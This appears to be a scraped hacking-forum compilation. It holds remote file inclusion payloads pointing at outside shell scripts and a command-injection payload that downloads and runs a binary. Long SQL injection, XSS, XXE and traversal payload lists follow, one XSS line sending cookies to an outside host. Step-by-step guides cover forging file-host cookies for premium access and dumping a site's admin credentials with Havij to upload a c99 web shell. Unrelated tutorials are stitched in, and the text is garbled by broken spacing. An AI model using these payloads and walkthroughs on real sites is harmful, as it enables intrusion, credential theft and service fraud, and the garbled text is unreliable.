CONFIG_EXT [LANGUAGES_DIR] = http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path = http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id

Wordpress, Drupal and others ...

/ Blog / xmlrpc.php
/ Blog / xmlsrv / xmlrpc.php
/ Blogs / xmlsrv / xmlrpc.php
/ Drupal / xmlrpc.php
/ Phpgroupware / xmlrpc.php
/ Wordpress / xmlrpc.php
/ Xmlrpc.php
/ Xmlrpc / xmlrpc.php
/ Xmlsrv / xmlrpc.php

AWStats

/ Awstats / awstats.pl
/ Cgi-bin/awstats.pl
/ Cgi-bin/awstats/awstats.pl
Payload
configdir = | echo; echo% 20YYY; cd% 20% 2ftmp% 3bwget% 20XX X% 2eXXX% 2eXX% 2eXX% 2fmirela% 3bchmod% 20% 2bx% 20mirela%

3b% 2e% 2fmirela; echo% 20YYY; echo |
Microsoft Applications / Extensions
Code:
/ 5c/_vti_bin/owssvr.dll
/ 5c/MSOffice/cltreq.asp
Payload
UL = 1 & ACT = 4 & BUILD = 6551 & STRMVER = 4 & CAPREQ = 0

DBImageGallery


/ Admin / attributes.php
/ Admin / images.php
/ Admin / scan.php
/ Includes / attributes.php
/ Includes / db_utils.php
/ Includes / images.php
/ Includes / utils.php
/ Includes / values.php
Payload
donsimg_base_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

DBGuestbook

/ Includes / guestbook.php
/ Includes / utils.php
/ Includes / views.php
Payload
dbs_base_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
Ultimate Fun Book
Code:
/ Board / / function.php
/ Funboard / function.php
/ Function.php
Payload
gbpfad = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /


Sinapis Forum CMS

/ Sinapis.php
/ Forum / / sinapis.php
/ FO / sinapis.php
Payload
fuss = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

Admin Phorum

PhpForums Admin Phorum
Files Requested
/ Actions / del.php
Payload
include_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
PMB Services
Code:
/ Cnl_prod / pmb / opac_css / includes / resa_func.inc.php
/ Pmb / opac_css / includes / resa_func.inc.php
/ Opac_css / includes / resa_func.inc.php
Payload
class_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
PHP-MIP
Code:
/ Php / top.php
/ Phpmip / / top.php
/ Top.php
Payload
laypath = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

SendStudio

Files Requested
/ Sendstudio / admin / includes / createemails.inc.php
/ Sendstudio / admin / includes / send_emails.inc.php
Payload
ROOTDIR = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
 


SQL

'
"
#
-
-
'-
- ';
';
= '
=;
= -
\ X23
\ X27
\ X3D \ x3B '
\ X3D \ x27
\ X27 \ x4F \ x52 SELECT *
\ X27 \ x6F \ x72 SELECT *
'Or select *
admin' -
'; Shutdown -
<>"'%;)(&+
'Or''='
'Or' x '=' x
"Or" x "=" x
') Or (' x '=' x
0 or 1 = 1
'Or 0 = 0 -
"Or 0 = 0 -
or 0 = 0 -
'Or 0 = 0 #
"Or 0 = 0 #
or 0 = 0 #
'Or 1 = 1 -
"Or 1 = 1 -
'Or '1' = '1 '-
"'Or 1 -'"
or 1 = 1 -
or% 201 = 1
or% 201 = 1 -
'Or 1 = 1 or''='
"Or 1 = 1 or" "="
'Or a = a -
"Or" a "=" a
') Or (' a '=' a
") Or (" a "=" a
hi "or" a "=" a
hi "or 1 = 1 -
hi 'or 1 = 1 -
hi 'or' a '=' a
hi ') or (' a '=' a
hi ") or (" a "=" a
'Hi' or 'x' = 'x';
@ Variable
, @ Variable
PRINT
PRINT @ @ variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
'Or username like'%
'Or uname like'%
'Or userid like'%
'Or uid like'%
'Or user like'%
exec xp
exec sp
'; Exec master .. xp_cmdshell
'; Exec xp_regread
t'exec master .. xp_cmdshell 'nslookup www.google.com' -
- Sp_password
\ X27UNION SELECT
'UNION SELECT
'UNION ALL SELECT
'Or (EXISTS)
'(Select top 1
'| | UTL_HTTP.REQUEST
1; SELECT% 20 *
to_timestamp_tz
tz_offset
<>"'%;)(&+
'% 20or% 201 = 1
% 27% 20or% 201 = 1
% 20 $ (sleep% 2050)
% 20'sleep% in 2050 '
char% 4039% 41% 2b% 40SELECT
'% 20OR
'Sqlattempt1
(Sqlattempt2)
|
% 7C
* |
% 2A% 7C
* (| (Mail =*))
% 2A% 28% 7C% 28mail% 3D% 2A% 29% 29
* (| (Objectclass =*))
% 2A% 28% 7C% 28objectclass% 3D% 2A% 29% 29
(
28%
)
29%
&
26%
!
21%
'Or 1 = 1 or''='
'Or''='
x 'or 1 = 1 or' x '=' y
/
/ /
/ / *
* / *


XSS

"> <script>"
<script> alert ("XSS") </ script>
<<script> Alert ("XSS ");//<</ script>
<script> alert (document.cookie) </ script>
'> <script> Alert (document.cookie) </ script>
'> <script> Alert (document.cookie); </ script>
\ "; Alert ('XSS');//
% 3cscript% 3ealert ("XSS");% 3c/script% 3e
% 3cscript% 3ealert (document.cookie);% 3c% 2fscript% 3e
% 3Cscript% 3Ealert (% 22X% 20SS% 22);% 3C/script% 3E
& Ltscript & gtalert (document.cookie); </ script>
& Ltscript & gtalert (document.cookie); & ltscript & gtale rt
<xss> <script> alert ('XSS') </ script> </ vulnerable>
<IMG% 20SRC = 'javascript: Alert (document.cookie) '>
<IMG SRC = "javascript: Alert ('XSS');">
<IMG SRC = "javascript: Alert ('XSS') "
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ("XSS")>
<IMG SRC = `javascript: Alert ("'XSS'")`>
<IMG """> <SCRIPT> Alert ("XSS") </ SCRIPT> ">
<IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))>
<IMG%20SRC='javasc Ript:alert(document.cookie)'>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC = "javascript: Alert ('XSS');">
<IMG DYNSRC = "javascript: Alert ('XSS') ">
<IMG LOWSRC = "javascript: Alert ('XSS') ">
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%2 3x6c;ert(document.%26%23x63;ookie)'>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascrip & # x74: alert ('X & # x53S' & # x29>
'% 3CIFRAME% 20SRC = javascript: Alert (% 2527XSS% 2527)% 3 E% 3C/IFRAME% 3E
"> <script> Document.location = 'http://your.site.com/cgi-bin/cookie.cgi?' + Document.cookie </ script>
% 22% 3E% 3Cscript% 3Edocument% 2Elocation% 3D% 27http% 3A% 2F% 2Fyour% 2Esite% 2Ecom% 2Fcgi% 2Dbin% 2Fcookie% 2Ecgi% 3F%

27% 20% 2Bdocument% 2Ecookie% 3C% 2Fscript% 3E

'';!--"< XSS >=&{()}



XML

count (/ child:: node ())
x 'or name () =' username 'or' x '=' y
<name>','')); phpinfo (); exit ;/*</ name>
<! [CDATA [<script> var n = 0; while (true) {n ++;}</ script>]]>
<! [CDATA [<]]> SCRIPT <! [CDATA [>]]> alert ('XSS');<![ CDATA [<]]>/ SCRIPT <! [CDATA [>]]>
<? Xml version = "1.0"
<? Xml version = "1.0" encoding = "ISO-8859-1"?> <foo> <! [CDATA ['or 1 = 1 or''=']]></ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file: / / c: /

boot.ini ">]> <foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// etc /

passwd ">]>< foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// etc /

shadow ">]>< foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// dev /

random ">]>< foo> &xxe; </ foo>
<xml ID=I> <X> <C> <! [CDATA [<IMG SRC="javas]]> <! [CDATA [cript: alert ('XSS');">]]>
<xml ID="xss"> <I> <B> <IMG SRC = "javas <! - -> cript: alert ('XSS')"></ B> </ I> </ xml > <SPAN DATASRC="#xss"

DATAFLD="B" DATAFORMATAS="HTML"> </ SPAN> </ C> </ X> </ xml> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> < / SPAN>
<xml SRC="xsstest.xml" ID=I> </ xml> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> </ SPAN>
<HTML Xmlns:xss> <? Import namespace = "xss" implementation = "http://ha.ckers.org/xss.htc"> <xss:xss> XSS </ xss: xss> </

HTML>



Traversal

.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / hosts% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / hosts
.. / .. / Boot.ini
/../../../../../../../../% 2A
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / passwd% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / passwd
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / shadow% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / shadow
/../../../../../../../../../../ Etc / passwd ^ ^
/../../../../../../../../../../ Etc / shadow ^ ^
/../../../../../../../../../../ Etc / passwd
/../../../../../../../../../../ Etc / shadow
/./././././././././././ Etc / passwd
/./././././././././././ Etc / shadow
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Etc / passwd
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Etc / shadow
. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Etc / passwd
. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Etc / shadow
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd% 00
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow% 00
% 0a/bin/cat% 20/etc/passwd
% 0a/bin/cat% 20/etc/shadow
00% 00/etc/passwd%
00% 00/etc/shadow%
% 00../../../../../../etc/passwd
% 00../../../../../../etc/shadow
/../../../../../../../../../../../ Etc / passwd% 00.jpg
/../../../../../../../../../../../ Etc / passwd% 00.html
/ ..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0 % af.. / etc / passwd
/ ..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0 % af.. / etc / shadow
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / etc / passwd
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / etc / shadow
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
/% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c .. % 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 255cboot.ini
/% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c .. % 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c..winnt/desktop.ini
\ \ '/ Bin / cat% 20/etc/passwd \ \'
\ \ '/ Bin / cat% 20/etc/shadow \ \'
.. / .. / .. / .. / .. / .. / .. / .. / Conf / server.xml
/../../../../../../../../ Bin / id |
C: / inetpub / wwwroot / global.asa
C: \ inetpub \ wwwroot \ global.asa
C: / boot.ini
C: \ boot.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Localstart.asp% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Localstart.asp
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Boot.ini% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Boot.ini
/./././././././././././ Boot.ini
/../../../../../../../../../../../ Boot.ini% 00
/../../../../../../../../../../../ Boot.ini
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Boot.ini
/. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Boot.ini
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini
/../../../../../../../../../../../ Boot.ini% 00.html
/../../../../../../../../../../../ Boot.ini% 00.jpg
/.../.../.../.../.../
..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af.. / boot.ini
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / boot.ini
 


IRIX:

/ Var / adm / SYSLOG
/ Var / adm / sulog
/ Var / adm / utmp
/ Var / adm / utmpx
/ Var / adm / wtmp
/ Var / adm / wtmpx
/ Var / adm / lastlog / username
/ Usr / spool / lp / log
/ Var / adm / lp / lpd-errs
/ Usr / lib / cron / log
/ Var / adm / loginlog
/ Var / adm / pacct
/ Var / adm / dtmp
/ Var / adm / acct / sum / loginlog
/ Var/adm/X0msgs
/ Var / adm / crash / vmcore
/ Var / adm / crash / unix

AIX:

/ Var / adm / pacct
/ Var / adm / wtmp
/ Var / adm / dtmp
/ Var / adm / qacct
/ Var / adm / sulog
/ Var / adm / ras / errlog
/ Var / adm / ras / bootlog
/ Var / adm / cron / log
/ Etc / utmp
/ Etc / security / lastlog
/ Etc / security / failedlogin
/ Usr / spool / mqueue / syslog

SunOS:

/ Var / adm / messages
/ Var / adm / aculogs
/ Var / adm / aculog
/ Var / adm / sulog
/ Var / adm / vold.log
/ Var / adm / wtmp
/ Var / adm / wtmpx
/ Var / adm / utmp
/ Var / adm / utmpx
/ Var / adm / log / asppp.log
/ Var / log / syslog
/ Var / log / POPlog
/ Var / log / authlog
/ Var / adm / pacct
/ Var / lp / logs / lpsched
/ Var / lp / logs / lpNet
/ Var / lp / logs / requests
/ Var / cron / log
/ Var / saf / _log
/ Var / saf / port / log

Linux:

/ Var / log / lastlog
/ Var / log / telnetd
/ Var / run / utmp
/ Var / log / secure
/ Root / .ksh_history
/ Root / .bash_history
/ Root / .bash_logut
/ Var / log / wtmp
/ Etc / wtmp
/ Var / run / utmp
/ Etc / utmp
/ Var / log
/ Var / adm
/ Var / apache / log
/ Var / apache / logs
/ Usr / local / apache / log
/ Usr / local / apache / logs
/ Var / log / acct
/ Var / log / xferlog
/ Var / log / messages
/ Var / log / proftpd / xferlog.legacy
/ Var / log / proftpd.access_log
/ Var / log / proftpd.xferlog
/ Var / log / httpd / error_log
/ Var / log / httpd / access_log
/ Etc / httpd / logs / access_log
/ Etc / httpd / logs / error_log
/ Var / log / httpsd / ssl.access_log
/ Var / log / httpsd / ssl_log
/ Var / log / httpsd / ssl.access_log
/ Etc / mail / access
/ Var / log / qmail
/ Var / log / smtpd
/ Var / log / samba
/ Var / log / samba-log.% M
/ Var / lock / samba
/ Root / .Xauthority
/ Var / log / poplog
/ Var / log / news.all
/ Var / log / spooler
/ Var / log / news
/ Var / log / news / news
/ Var / log / news / news.all
/ Var / log / news / news.crit
/ Var / log / news / news.err
/ Var / log / news / news.notice
/ Var / log / news / suck.err
/ Var / log / news / suck.notice
/ Var / spool / tmp
/ Var / spool / errors
/ Var / spool / logs
/ Var / spool / locks
/ Usr / local / www / logs / thttpd_log
/ Var / log / thttpd_log
/ Var / log / ncftpd / misclog.txt
/ Var / log / ncftpd.errs
/ Var / log / auth

Red Hat, Mac OS X

/ Var / log / httpd / access_log
/ Var / log / httpd / error_log

Solaris

/ Var / apache / logs / access_log
/ Var / apache / logs / error_log

SuSE Linux Enterprise Server

/ Var / log / httpd / access_log
/ Var / log / httpd / error_log

Lampp


/ Opt / lampp / logs / error_log
/ Opt / lampp / logs / access_log

Debian


/ Var / log / apache / access.log
/ Var / log / apache / error.log
/ Var / log / apache-ssl / error.log
/ Var / log / apache-ssl / access.log

FreeBSD

/ Usr / local / etc / httpd / logs / access_log
/ Usr / local / etc / httpd / logs / error_log

OpenBSD

/ Var / www / log / access_log
/ Var / www / log / error_log

Get Free YouTube Views

Get Free YouTube Views 

Ok heres what you do, FIRST sign up by clicking HERE

Then click Surf

Located on the top right.

Leave it up over night and you'll get big numbers after a couple of days xD

When you have enough credits goto your "control panel" then "My Videos" and add your video with views. 

Works great for me 

How To USE Cookies In Firefox With pics N00b Friendly

Step 1. Start firefox

Step 2. Go to Tools

Step 3. There go to Add-ons

Step 4. In Add-ons press Get Add-ons

Step 5. Search for "cookie"

Step 6. Install the one named "Edit Cookies"

and restart firefox

Step 7. Then go to filehost site you want to

login as premium

Step 8. Login with non premium account.

Step 9. Go to tools again and select "Edit

cookie" from bottom

Step 10. When you open it there is empty box

put in there "megaupload" then press

Filter/refresh button



Step 11. In there you should see cookie named

"user" click on it and then click on button

"edit"




Step 12. Then there should pop-up "add/edit

cookie" window. Fill in there the content you

have been given



Step 13. Then just Press "save". Close cookie

editor

Step 14. Refresh the site and there it is

premium account

For Other Websites Use These Locations

megaupload.com....................user

hotfile.com.......................auth

rapidshare.com....................enc

netload.in........................cookie _user

depositfiles.com..................autolo gin

oron.com..........................xfss

filesonic.com.....................PHPSES SID

fileserve.com.....................PHPSES SID


Cheers Friends

Web Bypass Tutorial

In this tutorial I'll be showing you how to bypass a filtered network just by following some simple steps. Instead of using a proxy server that uses non-standard ports, I'll be showing you another expolit in an easier way. We'll use the expolit found in the URL mechanism itself. The ideas works as follows:

Converting the URL to an IP address and then to its binary representation or equivalent. This kind of exploit can be used commonly on Mozilla and Netscape. Enjoy bypassing websites at your college, though I don't hold any reponsibility on how you tend to use this information whatsoever.

Use at your own risk !!!

Keep in mind that there are two kinds of filtered network. There is the software and hardware side. In this tutorial we'll be introduing the software side of them.


Step 1: 

Get the IP address for the web site you need to bypass.

For example, undergroundsystems (Underground Systems) blocked in Web-content filtering software has this IP address: 72.29.78.187

I obtained the web domain IP address by pinging the site in command prompt console.


Step 2: 

Convert each individual number in the IP address to an eight-digit binary number.

Note: Numbers having fewer than eight digits in their binary form must be padded with leading zeros to fill in the missing digits. For example, the binary number 1 is padded to 00000001 by adding seven zeros before the number one.

Each IP address that uses IPv4, is a 32 bit binary number, therefore 4 bytes in total. So we need to convert each quad dotted binary number in the IP address to its binary number.

For each number:

72 = 01001000

29 = 00011101

78 = 01001110

187 = 10111011

The windows Calculator can automatically convert numbers from decimal to binary notation:

i. Choose View -> Scientific.
ii. Click the Dec option button.
iii. Enter the number in decimal value.
iv. Click the Bin option button to show the number in binary format.


Step 3: 

Assemble or group the four 8 digit binary numbers into one 32-digit binary number.

01001000000111010100111010111011

Note: Don't add the binary numbers. Just organize them in the same order as the original IP address without the separating periods.


Step 4: 

Convert the 32-digit binary number to a decimal number.

For example, the 32-digit binary number 01001000000111010100111010111011 is equal to the decimal number 1209880251.


The decimal number doesn't need to be padded to a specific length.

Step 5:

Plug the decimal number into the Web browser's address field, like this:

http://1209880251

Viola, the Web Page loads easy as pie!

Note: The preceding steps will not bypass URL's in Internet Explorer (though in some cases it still works).

Countermeasures.

If the bypassing of certain Web-content filters is an issue for your network, ask your content-filtering vendor if it has a solution for it :p


Happy Hacking

How to change your MAC address

There are many reasons why you might choose to change your MAC address. Here is a guide on how to do it!

Linux:

Find the MAC address of your machine by typing this in terminal:

ifconfig -a | grep HWaddr

Then, sign in as root and do the following:

ifconfig eth0 down
ifconfig eth0 hw ether [NEW MAC ADDRESS HERE]
ifconfig eth0 up
ifconfig eth0 |grep HWaddr

Your new MAC address can be any 48 bit hexadecimal address.

Windows:
Pull up your windows menu, then go to Control Panel > Hardware and Sound > Device Manager > expand the Network Adapters section and pick your network device. Right click on it and choose properties. When a box pops up, go to the Advanced tab, select “Network Address” in a list, and select the radio button next to the blank Value field and enter the new MAC address.

Keep in mind:
Changing your MAC address is not permanent. After rebooting your computer, the machine will show the MAC address burnt into your network card, not the one you chose.

How To Sqli a website Using Software N00b Friendly

Thing You Need
Havij
C99 Shall
and
Adminpage Finder

now open Havij and enter you website in the url bar

Image exceeds set limits. Click to view full size image

and then push the analyze button

Image exceeds set limits. Click to view full size image

You Should See this afterwards

Image exceeds set limits. Click to view full size image

and then push the tables button and you will see the database

Image exceeds set limits. Click to view full size image

now click the Get Tables Button

Image exceeds set limits. Click to view full size image

now click on the user table and click Get Columns

Image exceeds set limits. Click to view full size image

---

Now Click On The User And Password Column And Push Get Data

Image exceeds set limits. Click to view full size image

The First Username And Password You See Should Be The Administrator
Now Open You Admin Page Finder And Put In The URL

Image exceeds set limits. Click to view full size image

And Click The Scan Button

Image exceeds set limits. Click to view full size image

Once You find The Page visit It in your web browser

Image exceeds set limits. Click to view full size image

Now Login With The Username And Pass You found in the database
Now If your website is a CMS like myn there should be a sidebar 
or navigation menu somewhere and theres always a place to 
upload images in my case the news

Now Rename the c99 script ANYTHING.PHP.JPG and upload it

Image exceeds set limits. Click to view full size image

now find the directory where the images are and goto your shell

Image exceeds set limits. Click to view full size image

And Now Your Done

How To Install Windows 7 Vista From USB Drive 100% working

This Tutorial will show you how to make your USB BOOTABLE for Windows 7/ Vista.

Having a bootable USB is very essential, especially if you are a Notbook user. Using bootable USB to install an operating system (OS) not only makes the 


installation faster, but also saves a DVD.


The main and biggest advantage that Installing windows 7/ Vista From USB is very fast it takes almost 20 to 30 minutes Only.


Note that this bootable USB guide will not work if you are trying to make a bootable USB on XP computer.


For this you require: 


1)Atleast 4Gb USB DRIVE


2) Windows 7/ Vista installation files.


The method is very simple and you can use without any hassles. Needless to say that your motherboard should support USB Boot feature to make use of the bootable USB drive.


Just follow these steps. 


NOTE: write commands correctly with spaces where require.


1) Open Command Prompt as administrator rights.


To access Command Prompt as administrator, Write "cmd" in start menu search box and hit CTRL+SHIFT+ENTER.


2) In Command Prompt write "DISKPART".

3) Now type "List DISK".

4) Now select the disk which is your USB. It may be (Disk 1, disk 2, or Disk 3) so choose carefully. Here mine its Disk 3.
   Format should be right this( select disk 3).

5) Now write "CLEAN" and hit "ENTER".

6) Type"CREATE PARTITION PRIMARY".

7) Type "SELECT PARTITION 1".

8) Type "ACTIVE".

9) Type "FORMAT FS=NTFS". ( Formating will take some time 10 to 15 minutes).

10) Type "ASSIGN".

11) Type "EXIT".

This is how the whole procedure looks.

Dont close Command Prompt as we need it.


Now insert Windows 7/Vista Dvd in the DVD-ROM.


12) Type "D: CD BOOT". (Name the drive which contain windows 7/Vista.)

13) Type "CD BOOT" again.

14) Type "BOOTSECT.EXE /NT60 G:" (Here I wrote G: because after formating in step 9 the drive name wil change automatically so check it before commanding). G: is USB DRIVE.


Given above command is to update the USB drive with BOOTMGR compatible code.

This will show full procedure.

Done. Close Command Prompt and copy Windows 7/Vista DVD contents into USB Drive.


Note: Before using USB as your boot device, Change boot priority from BIOS to USB. If you dont change Boot Priority USB will not Boot.


My Tutorails are fully workable and tested by me so there is no need to worry about anything. I told each and every step so that no one will have any 
problem.